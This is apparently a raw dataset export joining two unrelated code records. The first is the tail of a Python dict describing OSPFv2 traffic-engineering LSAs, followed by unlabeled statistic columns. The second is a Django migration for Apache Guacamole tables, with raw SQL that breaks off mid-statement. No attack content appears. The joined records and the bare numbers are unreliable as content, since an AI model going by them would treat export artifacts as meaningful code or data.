'checksum': '0x9023',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.51.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.205.1',
'age': 497,
'checksum': '0x921f',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.205.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.233 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.233',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.145.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.145.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.51.1',
'age': 475,
'checksum': '0x9a3b',
'fragment_number': 233,
'length': 116,
'lsa_id': '10.1.0.233',
'num_links': 1,
'opaque_id': 233,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.237 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.237',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.81.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.81.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.51.1',
'age': 455,
'checksum': '0x7c40',
'fragment_number': 237,
'length': 116,
'lsa_id': '10.1.0.237',
'num_links': 1,
'opaque_id': 237,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.42 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.42',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.196.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.196.2': {}},
'max_bandwidth': 2500000000,
'max_reservable_bandwidth': 1874999936,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 2,
'unreserved_bandwidths':
{'0 1874999936':
{'priority': 0,
'unreserved_bandwidth': 1874999936},
'1 1874999936':
{'priority': 1,
'unreserved_bandwidth': 1874999936},
'2 1874999936':
{'priority': 2,
'unreserved_bandwidth': 1874999936},
'3 1874999936':
{'priority': 3,
'unreserved_bandwidth': 1874999936},
'4 1874999936':
{'priority': 4,
'unreserved_bandwidth': 1874999936},
'5 1874999936':
{'priority': 5,
'unreserved_bandwidth': 1874999936},
'6 1874999936':
{'priority': 6,
'unreserved_bandwidth': 1874999936},
'7 1874999936':
{'priority': 7,
'unreserved_bandwidth': 1874999936}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 510,
'checksum': '0xcce3',
'fragment_number': 42,
'length': 116,
'lsa_id': '10.1.0.42',
'num_links': 1,
'opaque_id': 42,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.47 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.47',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.145.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.145.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 470,
'checksum': '0xcec3',
'fragment_number': 47,
'length': 116,
'lsa_id': '10.1.0.47',
'num_links': 1,
'opaque_id': 47,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.51 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.51',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.106.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.106.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 450,
'checksum': '0xd8b3',
'fragment_number': 51,
'length': 116,
'lsa_id': '10.1.0.51',
'num_links': 1,
'opaque_id': 51,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.55 192.168.4.1':
{'adv_router': '192.168.4.1',
'lsa_id': '10.1.0.55',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.196.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.196.1': {}},
'max_bandwidth': 2500000000,
'max_reservable_bandwidth': 1874999936,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 2,
'unreserved_bandwidths':
{'0 1874999936':
{'priority': 0,
'unreserved_bandwidth': 1874999936},
'1 1874999936':
{'priority': 1,
'unreserved_bandwidth': 1874999936},
'2 1874999936':
{'priority': 2,
'unreserved_bandwidth': 1874999936},
'3 1874999936':
{'priority': 3,
'unreserved_bandwidth': 1874999936},
'4 1874999936':
{'priority': 4,
'unreserved_bandwidth': 1874999936},
'5 1874999936':
{'priority': 5,
'unreserved_bandwidth': 1874999936},
'6 1874999936':
{'priority': 6,
'unreserved_bandwidth': 1874999936},
'7 1874999936':
{'priority': 7,
'unreserved_bandwidth': 1874999936}}}}}},
'header':
{'adv_router': '192.168.4.1',
'age': 510,
'checksum': '0x3372',
'fragment_number': 55,
'length': 116,
'lsa_id': '10.1.0.55',
'num_links': 1,
'opaque_id': 55,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.1.11 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.1.11',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.81.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.81.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.205.1',
'age': 447,
'checksum': '0x6537',
'fragment_number': 267,
'length': 116,
'lsa_id': '10.1.1.11',
'num_links': 1,
'opaque_id': 267,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.1.15 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.1.15',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1: {'admin_group': '0x0',
'link_id': '192.168.106.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.106.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.205.1',
'age': 457,
'checksum': '0x4765',
'fragment_number': 271,
'length': 116,
'lsa_id': '10.1.1.15',
'num_links': 1,
'opaque_id': 271,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}}}}}}}}},
'2': {}}}}}}}
| 91.373239
| 125
| 0.15447
| 1,695
| 51,900
| 4.536283
| 0.066667
| 0.158148
| 0.181038
| 0.04682
| 0.938093
| 0.920406
| 0.915073
| 0.896345
| 0.891533
| 0.891533
| 0
| 0.250091
| 0.787206
| 51,900
| 567
| 126
| 91.534392
| 0.446125
| 0
| 0
| 0.863717
| 0
| 0
| 0.142453
| 0.006937
| 0
| 0
| 0.004856
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8deba84b6f0885a2119882b50a0bbd5bfce310f1
| 36,724
|
py
|
Python
|
guacamole/migrations/0001_initial.py
|
NeCTAR-RC/bumblebee
|
8ba4c543695c83ea1ca532012203f05189438e23
|
[
"Apache-2.0"
] | 3
|
2021-11-19T10:45:17.000Z
|
2022-02-15T21:57:58.000Z
|
guacamole/migrations/0001_initial.py
|
NeCTAR-RC/bumblebee
|
8ba4c543695c83ea1ca532012203f05189438e23
|
[
"Apache-2.0"
] | null | null | null |
guacamole/migrations/0001_initial.py
|
NeCTAR-RC/bumblebee
|
8ba4c543695c83ea1ca532012203f05189438e23
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-08-27 01:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import guacamole.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GuacamoleConnection',
fields=[
('connection_id', models.AutoField(primary_key=True, serialize=False)),
('connection_name', models.CharField(max_length=128)),
('parent_id', models.IntegerField(blank=True, null=True)),
('protocol', models.CharField(default='rdp', max_length=32)),
('proxy_port', models.IntegerField(blank=True, null=True)),
('proxy_hostname', models.CharField(blank=True, max_length=512, null=True)),
('proxy_encryption_method', models.CharField(blank=True, max_length=4, null=True)),
('max_connections', models.IntegerField(blank=True, null=True)),
('max_connections_per_user', models.IntegerField(blank=True, null=True)),
('connection_weight', models.IntegerField(blank=True, null=True)),
('failover_only', models.BooleanField(default=False)),
],
options={
'db_table': 'guacamole_connection',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionGroup',
fields=[
('connection_group_id', models.AutoField(primary_key=True, serialize=False)),
('connection_group_name', models.CharField(max_length=128)),
('parent_id', models.IntegerField(blank=True, null=True)),
('type', guacamole.fields.GuacamoleConnectionGroupTypeField(choices=[('ORGANIZATIONAL', 'ORGANIZATIONAL'), ('BALANCING', 'BALANCING')], default='ORGANIZATIONAL')),
('max_connections', models.IntegerField(blank=True, null=True)),
('max_connections_per_user', models.IntegerField(blank=True, null=True)),
('enable_session_affinity', models.BooleanField(default=False)),
],
options={
'db_table': 'guacamole_connection_group',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionHistory',
fields=[
('history_id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=128)),
('remote_host', models.CharField(blank=True, max_length=256, null=True)),
('connection_name', models.CharField(max_length=128)),
('sharing_profile_name', models.CharField(blank=True, max_length=128, null=True)),
('start_date', models.DateTimeField()),
('end_date', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'guacamole_connection_history',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleEntity',
fields=[
('entity_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128)),
('type', models.CharField(max_length=10)),
],
options={
'db_table': 'guacamole_entity',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleSharingProfile',
fields=[
('sharing_profile_id', models.AutoField(primary_key=True, serialize=False)),
('sharing_profile_name', models.CharField(max_length=128)),
],
options={
'db_table': 'guacamole_sharing_profile',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUser',
fields=[
('user_id', models.AutoField(primary_key=True, serialize=False)),
('password_hash', models.CharField(max_length=32)),
('password_salt', models.CharField(blank=True, max_length=32, null=True)),
('password_date', models.DateTimeField(auto_now_add=True)),
('disabled', models.BooleanField(default=False)),
('expired', models.BooleanField(default=False)),
('access_window_start', models.TimeField(blank=True, null=True)),
('access_window_end', models.TimeField(blank=True, null=True)),
('valid_from', models.DateField(blank=True, null=True)),
('valid_until', models.DateField(blank=True, null=True)),
('timezone', models.CharField(blank=True, max_length=64, null=True)),
('full_name', models.CharField(blank=True, max_length=256, null=True)),
('email_address', models.CharField(blank=True, max_length=256, null=True)),
('organization', models.CharField(blank=True, max_length=256, null=True)),
('organizational_role', models.CharField(blank=True, max_length=256, null=True)),
],
options={
'db_table': 'guacamole_user',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserGroup',
fields=[
('user_group_id', models.AutoField(primary_key=True, serialize=False)),
('disabled', models.BooleanField(default=False)),
],
options={
'db_table': 'guacamole_user_group',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserHistory',
fields=[
('history_id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=128)),
('remote_host', models.CharField(blank=True, max_length=256, null=True)),
('start_date', models.DateTimeField()),
('end_date', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'guacamole_user_history',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserPasswordHistory',
fields=[
('password_history_id', models.AutoField(primary_key=True, serialize=False)),
('password_hash', models.CharField(max_length=32)),
('password_salt', models.CharField(blank=True, max_length=32, null=True)),
('password_date', models.DateTimeField()),
],
options={
'db_table': 'guacamole_user_password_history',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionAttribute',
fields=[
('connection', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleconnection')),
('attribute_name', models.CharField(max_length=128)),
('attribute_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_connection_attribute',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionGroupAttribute',
fields=[
('connection_group', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleconnectiongroup')),
('attribute_name', models.CharField(max_length=128)),
('attribute_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_connection_group_attribute',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionGroupPermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleObjectPermissionTypeField(choices=[('READ', 'READ'), ('UPDATE', 'UPDATE'), ('DELETE', 'DELETE'), ('ADMINISTER', 'ADMINISTER')], default='READ')),
],
options={
'db_table': 'guacamole_connection_group_permission',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionParameter',
fields=[
('connection', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleconnection')),
('parameter_name', models.CharField(max_length=128)),
('parameter_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_connection_parameter',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleConnectionPermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleObjectPermissionTypeField(choices=[('READ', 'READ'), ('UPDATE', 'UPDATE'), ('DELETE', 'DELETE'), ('ADMINISTER', 'ADMINISTER')], default='READ')),
],
options={
'db_table': 'guacamole_connection_permission',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleSharingProfileAttribute',
fields=[
('sharing_profile', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamolesharingprofile')),
('attribute_name', models.CharField(max_length=128)),
('attribute_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_sharing_profile_attribute',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleSharingProfileParameter',
fields=[
('sharing_profile', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamolesharingprofile')),
('parameter_name', models.CharField(max_length=128)),
('parameter_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_sharing_profile_parameter',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleSharingProfilePermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleObjectPermissionTypeField(choices=[('READ', 'READ'), ('UPDATE', 'UPDATE'), ('DELETE', 'DELETE'), ('ADMINISTER', 'ADMINISTER')], default='READ')),
],
options={
'db_table': 'guacamole_sharing_profile_permission',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleSystemPermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleSystemPermissionTypeField(choices=[('CREATE_CONNECTION', 'CREATE_CONNECTION'), ('CREATE_CONNECTION_GROUP', 'CREATE_CONNECTION_GROUP'), ('CREATE_USER', 'CREATE_USER'), ('ADMINISTER', 'ADMINISTER')])),
],
options={
'db_table': 'guacamole_system_permission',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserAttribute',
fields=[
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleuser')),
('attribute_name', models.CharField(max_length=128)),
('attribute_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_user_attribute',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserGroupAttribute',
fields=[
('user_group', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleusergroup')),
('attribute_name', models.CharField(max_length=128)),
('attribute_value', models.CharField(max_length=4096)),
],
options={
'db_table': 'guacamole_user_group_attribute',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserGroupMember',
fields=[
('user_group', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleusergroup')),
],
options={
'db_table': 'guacamole_user_group_member',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserGroupPermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleObjectPermissionTypeField(choices=[('READ', 'READ'), ('UPDATE', 'UPDATE'), ('DELETE', 'DELETE'), ('ADMINISTER', 'ADMINISTER')], default='READ')),
],
options={
'db_table': 'guacamole_user_group_permission',
'managed': False,
},
),
migrations.CreateModel(
name='GuacamoleUserPermission',
fields=[
('entity', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='guacamole.guacamoleentity')),
('permission', guacamole.fields.GuacamoleObjectPermissionTypeField(choices=[('READ', 'READ'), ('UPDATE', 'UPDATE'), ('DELETE', 'DELETE'), ('ADMINISTER', 'ADMINISTER')], default='READ')),
],
options={
'db_table': 'guacamole_user_permission',
'managed': False,
},
),
]
if settings.DATABASES['default']['ENGINE'] == 'django.db.backends.sqlite3':
operations.append(
migrations.RunSQL("""
CREATE TABLE guacamole_connection_group (
connection_group_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
parent_id integer,
connection_group_name varchar(128) NOT NULL,
type text NOT NULL,
max_connections integer,
max_connections_per_user integer,
enable_session_affinity boolean NOT NULL DEFAULT 0,
UNIQUE (connection_group_name, parent_id)
);
CREATE TABLE guacamole_connection (
connection_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
connection_name varchar(128) NOT NULL,
parent_id integer,
protocol varchar(32) NOT NULL,
proxy_port integer,
proxy_hostname varchar(512),
proxy_encryption_method text,
max_connections integer,
max_connections_per_user integer,
connection_weight integer,
failover_only boolean NOT NULL DEFAULT 0,
UNIQUE (connection_name, parent_id)
);
CREATE TABLE guacamole_entity (
entity_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
name varchar(128) NOT NULL,
type text NOT NULL,
UNIQUE (type, name)
);
CREATE TABLE guacamole_user (
user_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
entity_id integer NOT NULL,
password_hash binary(32) NOT NULL,
password_salt binary(32),
password_date datetime NOT NULL,
disabled boolean NOT NULL DEFAULT 0,
expired boolean NOT NULL DEFAULT 0,
access_window_start TIME,
access_window_end TIME,
valid_from DATE,
valid_until DATE,
timezone VARCHAR(64),
full_name VARCHAR(256),
email_address VARCHAR(256),
organization VARCHAR(256),
organizational_role VARCHAR(256),
UNIQUE (entity_id)
);
CREATE TABLE guacamole_user_group (
user_group_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
entity_id integer NOT NULL,
disabled boolean NOT NULL DEFAULT 0,
UNIQUE (entity_id)
);
CREATE TABLE guacamole_user_group_member (
user_group_id integer NOT NULL,
member_entity_id integer NOT NULL,
PRIMARY KEY (user_group_id, member_entity_id)
);
CREATE TABLE guacamole_sharing_profile (
sharing_profile_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
sharing_profile_name varchar(128) NOT NULL,
primary_connection_id integer NOT NULL,
UNIQUE (sharing_profile_name, primary_connection_id)
);
CREATE TABLE guacamole_connection_parameter (
connection_id integer NOT NULL,
parameter_name varchar(128) NOT NULL,
parameter_value varchar(4096) NOT NULL,
PRIMARY KEY (connection_id,parameter_name)
);
CREATE TABLE guacamole_sharing_profile_parameter (
sharing_profile_id integer NOT NULL,
parameter_name varchar(128) NOT NULL,
parameter_value varchar(4096) NOT NULL,
PRIMARY KEY (sharing_profile_id, parameter_name)
);
CREATE TABLE guacamole_user_attribute (
user_id integer NOT NULL,
attribute_name varchar(128) NOT NULL,
attribute_value varchar(4096) NOT NULL,
PRIMARY KEY (user_id, attribute_name)
);
CREATE TABLE guacamole_user_group_attribute (
user_group_id integer NOT NULL,
attribute_name varchar(128) NOT NULL,
attribute_value varchar(4096) NOT NULL,
PRIMARY KEY (user_group_id, attribute_name)
);
CREATE TABLE guacamole_connection_attribute (
connection_id integer NOT NULL,
attribute_name varchar(128) NOT NULL,
attribute_value varchar(4096) NOT NULL,
PRIMARY KEY (connection_id, attribute_name)
);
CREATE TABLE guacamole_connection_group_attribute (
connection_group_id integer NOT NULL,
attribute_name varchar(128) NOT NULL,
attribute_value varchar(4096) NOT NULL,
PRIMARY KEY (connection_group_id, attribute_name)
);
CREATE TABLE guacamole_sharing_profile_attribute (
sharing_profile_id integer NOT NULL,
attribute_name varchar(128) NOT NULL,
attribute_value varchar(4096) NOT NULL,
PRIMARY KEY (sharing_profile_id, attribute_name)
);
CREATE TABLE guacamole_connection_permission (
entity_id integer NOT NULL,
connection_id integer NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id,connection_id,permission)
);
CREATE TABLE guacamole_connection_group_permission (
entity_id integer NOT NULL,
connection_group_id integer NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id,connection_group_id,permission)
);
CREATE TABLE guacamole_sharing_profile_permission (
entity_id integer NOT NULL,
sharing_profile_id integer NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id,sharing_profile_id,permission)
);
CREATE TABLE guacamole_system_permission (
entity_id int(11) NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id,permission)
);
CREATE TABLE guacamole_user_permission (
entity_id int(11) NOT NULL,
affected_user_id int(11) NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id,affected_user_id,permission)
);
CREATE TABLE guacamole_user_group_permission (
entity_id integer NOT NULL,
affected_user_group_id integer NOT NULL,
permission text NOT NULL,
PRIMARY KEY (entity_id, affected_user_group_id, permission)
);
CREATE TABLE guacamole_connection_history (
history_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
user_id integer DEFAULT NULL,
username varchar(128) NOT NULL,
remote_host varchar(256) DEFAULT NULL,
connection_id integer DEFAULT NULL,
connection_name varchar(128) NOT NULL,
sharing_profile_id integer DEFAULT NULL,
sharing_profile_name varchar(128) DEFAULT NULL,
start_date datetime NOT NULL,
end_date datetime DEFAULT NULL
);
CREATE TABLE guacamole_user_history (
history_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
user_id integer DEFAULT NULL,
username varchar(128) NOT NULL,
remote_host varchar(256) DEFAULT NULL,
start_date datetime NOT NULL,
end_date datetime DEFAULT NULL
);
CREATE TABLE guacamole_user_password_history (
password_history_id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
user_id integer NOT NULL,
password_hash binary(32) NOT NULL,
password_salt binary(32),
password_date datetime NOT NULL
);
"""))
elif settings.DATABASES['default']['ENGINE'] == 'django.db.backends.mysql':
operations.append(
migrations.RunSQL("""
CREATE TABLE `guacamole_connection_group` (
`connection_group_id` int(11) NOT NULL AUTO_INCREMENT,
`parent_id` int(11),
`connection_group_name` varchar(128) NOT NULL,
`type` enum('ORGANIZATIONAL',
'BALANCING') NOT NULL DEFAULT 'ORGANIZATIONAL',
`max_connections` int(11),
`max_connections_per_user` int(11),
`enable_session_affinity` boolean NOT NULL DEFAULT 0,
PRIMARY KEY (`connection_group_id`),
